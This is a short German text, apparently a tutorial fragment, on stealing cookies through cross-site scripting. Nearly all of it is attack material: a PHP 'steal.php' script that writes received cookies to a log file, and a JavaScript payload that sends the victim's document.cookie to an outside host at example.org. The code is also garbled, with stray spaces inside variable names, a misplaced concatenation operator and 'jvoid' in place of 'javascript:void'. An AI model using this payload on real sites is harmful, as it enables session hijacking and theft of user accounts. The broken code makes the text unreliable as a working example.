Cookie Stealing ist einer der grundlegenden Askepte, des XSS (Cross Site Scripting).
Ein Beispiel für ein PHP-Script:
steal.php
$ cookie = $ _GET ['cookie']; $ log = fopen ("log.txt", "a"); fwrite ($ log, $ cookie "\ n".); fclose ($ log);
Angriff
document.location = 'http://example.org/steal.php?cookie =' + document.cookie; oder jvoid (document.location = 'http://example.org/steal.php?cookie =' + document.cookie);